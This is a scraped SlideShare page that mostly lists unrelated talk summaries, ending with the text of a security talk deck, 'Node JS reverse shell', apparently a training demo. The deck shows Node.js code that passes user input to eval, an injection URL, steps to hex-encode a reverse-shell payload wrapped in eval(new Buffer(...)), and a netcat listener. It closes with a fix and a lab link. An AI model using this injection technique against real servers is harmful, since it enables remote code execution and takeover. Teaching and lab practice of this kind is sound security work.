Do we stick with a new programming tool only because it's the trendy new tool when we assess it? Maybe some of us do that, but the mature course of action is to compare each tool. The technical justification for choosing Node.js is what this chapter is all about. Prior to writing any code, it is important to understand what Node.js is and how it fits into the larger market for software development tools. Then, realizing that tinkering about in live code is frequently the greatest way to learn.
Day In A Life Of A Node.js Developer
Node.js uses JavaScript - a language known to millions of developers worldwide - thus giving it a much lower learning curve even for complete beginners. Using Node.js you can build simple Command Line programs or complex enterprise level web applications with equal ease. Node.js is an event-driven, server-side, asynchronous development platform with lightning speed execution. Node.js helps you to code the most complex functionalities in just a few lines of code.
Day in a life of a node.js developer
The document provides an overview of the Mastering Node.js course from Edureka. The course objectives include understanding Node.js development basics, using Node's package manager npm, developing server-side applications, creating RESTful APIs, and testing and debugging code. The document also discusses uses cases of Node.js in areas like server-side web applications, high scalability, and low memory consumption. It covers basics of Node.js like building a simple web server and using Socket.io for real-time communication. Node.js developers can create RESTful APIs, and must learn to debug and test their code.
JAX London 2015: Java vs Nodejs
Presented at JAX London 2015.
The last few years have seen a huge growth in the usage of JavaScript, to the extent that it is often reported to be the #1 programming language in use today. Additionally, the arrival of server-side JavaScript through frameworks such as Node.js and Ringo.js, and JavaScript on the JVM through Nashorn and Avatar.js, means that enterprise web applications written in JavaScript are not just a possibility—but a reality for companies such as LinkedIn, eBay, Yahoo, ADP and Dow Jones. This session will compare and contrast the two platforms and describe the advantages of each for deploying, managing and monitoring highly scalable applications.
Java vs. Java Script for enterprise web applications - Chris Bailey
The document compares Java and JavaScript for enterprise web applications. It finds that while JavaScript has a larger developer base and adoption according to metrics like GitHub repositories and StackOverflow surveys, Java remains dominant in enterprise applications and for server-side development. It discusses the different deployment models for each language, with JavaScript being ubiquitous in browsers while Java has a long history on servers. JavaScript code tends to be more concise, requiring around 1/3 less code on average. The document also evaluates performance, finding JavaScript is faster for I/O tasks while slower for computationally intensive work. It discusses challenges in optimizing dynamically typed languages like JavaScript.
Proposal
Node.js is a server-side JavaScript platform that allows building scalable network applications quickly. It uses an event-driven, non-blocking I/O model that makes it lightweight and efficient. Node.js runs on a single thread event loop, handles concurrent connections without blocking and takes advantage of asynchronous programming. It is commonly used for real-time applications that require two-way communication between client and server like chat, streaming etc.
Similar to Node JS reverse shell (20)
Java vs. Java Script for enterprise web applications - Chris Bailey
Java vs. Java Script for enterprise web applications - Chris Bailey
Recently uploaded
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
5th LF Energy Power Grid Model Meet-up Slides
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays, June 2024 with Maria Copot 20
Skybuffer SAM4U tool for SAP license adoption
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Northern Engraving | Nameplate Manufacturing Process - 2024
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
High performance Serverless Java on AWS- GoTo Amsterdam 2024
Java is for many years one of the most popular programming languages, but it used to have hard times in the Serverless community. Java is known for its high cold start times and high memory footprint, comparing to other programming languages like Node.js and Python. In this talk I'll look at the general best practices and techniques we can use to decrease memory consumption, cold start times for Java Serverless development on AWS including GraalVM (Native Image) and AWS own offering SnapStart based on Firecracker microVM snapshot and restore and CRaC (Coordinated Restore at Checkpoint) runtime hooks. I'll also provide a lot of benchmarking on Lambda functions trying out various deployment package sizes, Lambda memory settings, Java compilation options and HTTP (a)synchronous clients and measure their impact on cold and warm start times.
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops Opensource Database Meetup 16
Topic: Must-Know PostgreSQL Extensions for Developers and DBAs During Migration
Speaker: Deepak Mahto, Founder of DataCloudGaze Consulting
Date & Time: 8th June | 10 AM - 1 PM IST
Venue: Bangalore International Centre, Bangalore
Abstract: Discover how PostgreSQL extensions can be your secret weapon! This talk explores how key extensions enhance database capabilities and streamline the migration process for users moving from other relational databases like Oracle.
Key Takeaways:
* Learn about crucial extensions like oracle_fdw, pgtt, and pg_audit that ease migration complexities.
* Gain valuable strategies for implementing these extensions in PostgreSQL to achieve license freedom.
* Discover how these key extensions can empower both developers and DBAs during the migration process.
* Don't miss this chance to gain practical knowledge from an industry expert and stay updated on the latest open-source database trends.
Mydbops Managed Services specializes in taking the pain out of database management while optimizing performance. Since 2015, we have been providing top-notch support and assistance for the top three open-source databases: MySQL, MongoDB, and PostgreSQL.
Our team offers a wide range of services, including assistance, support, consulting, 24/7 operations, and expertise in all relevant technologies. We help organizations improve their database's performance, scalability, efficiency, and availability.
Contact us: info@mydbops.com
Visit: https://www.mydbops.com/
Follow us on LinkedIn: https://in.linkedin.com/company/mydbops
For more details and updates, please follow up the below links.
Meetup Page : https://www.meetup.com/mydbops-databa...
Twitter: https://twitter.com/mydbopsofficial
Blogs: https://www.mydbops.com/blog/
Facebook(Meta): https://www.facebook.com/mydbops/
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
HERE IS YOUR WEBINAR CONTENT! 'Mastering Customer Journey Management with Dr. Graham Hill'. We hope you find the webinar recording both insightful and enjoyable.
In this webinar, we explored essential aspects of Customer Journey Management and personalization. Here’s a summary of the key insights and topics discussed:
Key Takeaways:
Understanding the Customer Journey: Dr. Hill emphasized the importance of mapping and understanding the complete customer journey to identify touchpoints and opportunities for improvement.
Personalization Strategies: We discussed how to leverage data and insights to create personalized experiences that resonate with customers.
Technology Integration: Insights were shared on how inQuba’s advanced technology can streamline customer interactions and drive operational efficiency.
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
How we managed to grow and scale a RAG application from zero to thousands of users in 7 months. Lessons from technical challenges around managing high load for LLMs, RAGs and Vector databases.
What is an RPA CoE? Session 1 – CoE Vision
In the first session, we will review the organization's vision and how this has an impact on the COE Structure.
Topics covered:
• The role of a steering committee
• How do the organization’s priorities determine CoE Structure?
Speaker:
Chris Bolin, Senior Intelligent Automation Architect Anika Systems
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
AppSec PNW: Android and iOS Application Security with MobSF
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
Main news related to the CCS TSI 2023 (2023/1695)
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Mutation Testing for Task-Oriented Chatbots
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
Fueling AI with Great Data with Airbyte Webinar
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Recently uploaded (20)
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
Overcoming the PLG Trap: Lessons from Canva's Head of Sales & Head of EMEA Da...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Node JS reverse shell
- 2. ABOUT ME Madhu Akula - Automation Security Ninja at Interested in Security & DevOps Never ending learner! @madhuakula Appsecco
- 3. WHAT IS NODE JS? Node.js is an open-source, cross-platform runtime environment for developing server- side Web applications. Although Node.js is not a JavaScript framework, many of its basic modules are written in JavaScript, and developers can write new modules in JavaScript. The runtime environment interprets JavaScript using Google's V8 JavaScript engine. wikipedia
- 4. HELLO WORLD HTTP SERVER IN NODE JS var http = require('http'); var server = http.createServer(function(req, res) { res.writeHead(200); res.end('Hello World'); }); server.listen(2000);
- 5. WHY NODE JS SECURITY? A lot of the application are moving to Javascript, especially with MEAN (Mongo-Express-Angular-Node) stack.
- 6. HOW TO TEST NODE JS SECURITY? It's similar to the normal web application security and adds additional checks for the Javascript vulnerabilities.
- 7. DEMO TIME
- 8. REVERSE SHELL ON A NODE.JS APPLICATION BY @WIREMASK POC SETUP
- 9. VULNERABLE NODE JS CODE 'use strict' const http = require('http'); const url = require('url'); const path = require('path'); const animalsJSON = path.join(__dirname, 'animals.json'); const animals = require(animalsJSON); function requestHandler(req, res) { let urlParams = url.parse(req.url, true); let queryData = urlParams.query; res.writeHead(200, {"ContentType": "application/json"});
- 11. IDENTIFICATION The stringToRegexpfunction is evaluating user input to create a RegExpobject and use it to find elements in an array. return eval(prefix + output + suffix); // we control output value
- 12. We can insert our own Javascript code in the output variable and execute it. The stringToRegexpfunction will escape some characters and the outputvalue will be evaluated. http://localhost:3000/?name=["./;require('util').log('Owned');//*"]
- 16. HEX PAYLOAD CREATION USING PYTHON >>> payload = 'nodejs reverse shell Java Script code' >>> payload.encode('hex')
- 17. FINAL URL WITH PAYLOAD http://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20
- 18. CHECK YOUR NETCAT LISTENER
- 19. CONCLUSION It's highly recommended to avoid using the evalfunction in a Javascript project. The fix was rather simple, they started using using the RegExpobject directly.
- 20. WANT TO TRY YOUR YOURSELF? https://github.com/appsecco/vulnerable-apps docker run p 3000:3000 d appsecco/nodereverseshell
- 21. PLAYGROUND FOR NODEJS VULNERABILITIES DAMN VULNERABLE NODE APPLICATION Ansible Playbook & Docker
- 22. NODE JS SECURITY REFERENCES https://www.npmjs.com/package/helmet https://blog.risingstack.com/node-js-security-checklist/ https://nodesecurity.io/resources https://groups.google.com/forum/#!forum/nodejs-sec